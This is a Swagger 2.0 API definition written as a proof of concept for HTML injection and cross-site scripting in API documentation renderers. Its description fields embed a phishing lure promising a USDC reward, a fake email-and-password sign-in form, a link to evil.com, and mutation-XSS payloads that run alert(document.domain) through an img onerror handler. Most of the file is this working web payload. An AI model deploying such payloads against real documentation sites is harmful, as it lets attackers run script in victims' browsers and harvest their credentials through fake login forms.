swagger: '2.0'
info:
  title: PoC for Html Injection
  description: |
    <h1>PoC for HTML Injection by Seminyak. CONGRATS you win 10,000 USDC reward, please go to our partner website and fill up your wallet account details to get yout USDC or login below with your VALID ACCOUNT:</h1> <h1><a href="https://evil.com" onclick="alert('XSS by Seminyak')">Click Here</a></h1>
    <form><label><input id="textbox" type="text" placeholder="EMAIL" style="width:320px;height=30px"></label><br><label><input  id="textbox" type="text" placeholder="PASSWORD" style="width:320px"></label><br><input type="submit" value="SIGN IN" onclick="msg()"></form>
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src='x'>"></form>

  version: "1.0"
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  "/test":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - PoC
      operationId: findAccounts
      summary: this is example text
  "/test_for_poc":
    delete:
      parameters:
      - description: |
          <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="<h1>hide here</h1>"></form>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - test
      operationId: test
      summary: test
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - abir
      operationId: some_operation
      summary: this is example text
